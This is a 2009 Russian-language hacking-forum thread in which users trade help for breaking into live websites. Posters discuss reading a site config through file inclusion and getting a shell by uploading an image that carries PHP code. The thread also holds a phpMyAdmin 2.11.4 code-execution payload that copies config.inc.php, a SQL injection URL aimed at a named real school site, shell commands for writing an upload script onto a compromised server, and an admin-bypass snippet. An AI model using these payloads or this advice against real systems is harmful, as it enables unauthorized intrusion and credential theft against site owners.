Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    ну вот именно, как бы сделать скюль...
     
  2. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Такой вопрос...

    Почему при загрузке файла с бек слешом ("\" без ковычек), отделяется все что было до бек слеша

    К примеру
    Грузим файл под названием: file.php\jpg
    А PHP берет и загружает под именем: jpg
     
  3. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Потому что file.php воспринимается как имя директории и отсекается.
     
  4. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Народ,разъясните такую фишку:

    PHP:

    if(strstr($username'**')) {

    $admin 1;
    $username str_replace('**'''$username);
    $_SESSION['admin'] = 1;

    } else {

    $admin 0;

    }


    Я так понял,если в поле username(входа в админку,например) содержится **,то я получаю админскую сессию,становясь,таким образом,админом?))И стать им может любой,кто введёт эти две звёздочки в любом месте поля username...
    Только я не понял смысла это выкладывать - ведь не узнаешь,пока исходник скрипта не прочитаешь(а я так понял,это самоделка какая-то,а не кусок кода популярного двига).

    Взял с _http://oxod.ru/2009/11/23/лучшие-из-лучших/#more-380
     
  5. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге).
    Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
     
  6. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    С такими способами один шанс на несколько тысяч миллиардов.
    для удаленного коннекта должен быть разрешен коннект именно для твоего айпи.
    ищи phpMyAdmin.
    Бруть диры.
    Могу посоветовать сканер http://security-digger.org/
     
    1 person likes this.
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605
    Естественно , там localhost, то есть тока фактически с этого компа (серва) ты можеш приконнектиться к БД, а удаленно ни как

    попробуй найти форум/аплоад картинок/etc/
    что ба залить фотку с пхп кодом, и инклудь ее уж тогда, что бы потом получить шелл,а вот с шелла и заходи в БД , если будет такая необходимость
     
    _________________________
    #10267 HAXTA4OK, 24 Nov 2009
    Last edited: 24 Nov 2009
    1 person likes this.
  8. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Почему не работает команда lynx ? Вроде делаю всё прально:

    lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html

    На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён.Touch работает.Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...
     
    #10268 GenTao, 24 Nov 2009
    Last edited: 24 Nov 2009
  9. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Посмотри есть ли сама качалка
    потом уже качай
    UPDATE:
    не проверил, но мне кажется синтаксис мягко говоря не верный.
    "www.obsd.si/faq/pf/index.html" ...
    (Чисто субъективное мнение, ни тебе протокола, ни здавствуйте, ни досвиданья! =))
     
    #10269 Twoster, 24 Nov 2009
    Last edited: 24 Nov 2009
  10. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Качалка есть,проверял
     
  11. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    261
    Likes Received:
    440
    Reputations:
    275
    Ага, типа
    в место phpinfo, думаю стоит указать что-то типа:
    и через этот скрипт средствами php уже грузить любые файлы.
     
    4 people like this.
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    which which wget curl lynx links fetch
     
  13. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    да, спасибо, мне стало лучше, особенно
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это чтобы проверить есть ли which, если ты не понял =\
     
  15. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    А which тебе что покажет, если его нет? :D
    т.е. результат which which и which curl будет разный, если самого which нету? =\

    З.Ы. Модеры, сорри
     
  16. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Хм..попробовал:

    echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php

    Чет не канает...

    Кстати,sudo команда доступна...Забыл добавить,что админка -
    Code:
    Siteman2
    Там ещё фильтруются двойные кавычки,посему пришлось извращаться через селект и лить свой убогий шелл).Оттуда и выполняю команды теперь.
     
    #10276 GenTao, 24 Nov 2009
    Last edited: 24 Nov 2009
  17. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    А <? ... ?> кто напишет?
    И что именно не канает? это расплывчатое понятие.
    1) не загружается файл (естественно, в файле не скрипт а белиберда)
    2) не пишется в сам файл
    3) не могу форму сделать для загрузки файла
    4) написал чушь, 9.php')" > /var/www/htdocs/write/9.php
     
    2 people like this.
  18. schwarze

    schwarze Member

    Joined:
    1 Dec 2008
    Messages:
    64
    Likes Received:
    38
    Reputations:
    5
    PhpmyAdmin 2.11.4

    Есть Windows сервер с XAMPP (MySQL 5.03, phpMyAdmin 2.11.4).
    Уязвимых скриптов не нашел, страницы - полуголая статика. Обратил внимание на пхпМайАдмин, порылся на ачате - нашел уязвимость, нормального описания ее найти не смог, как использовать тоже.
    Кто может объяснить более подробно как использовать уязвимость или дать ссылку, где можно почитать.
    P.S. я про server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&amp;sort_order=desc&amp;token=[valid token]
     
  19. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    тебе нужен валидный токен,т.е надо валидный логин пасс на пхп админ.
    порты проскань,можешь найдешь что нить
     
  20. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    _http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default

    Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...
     
Loading...
Thread Status:
Not open for further replies.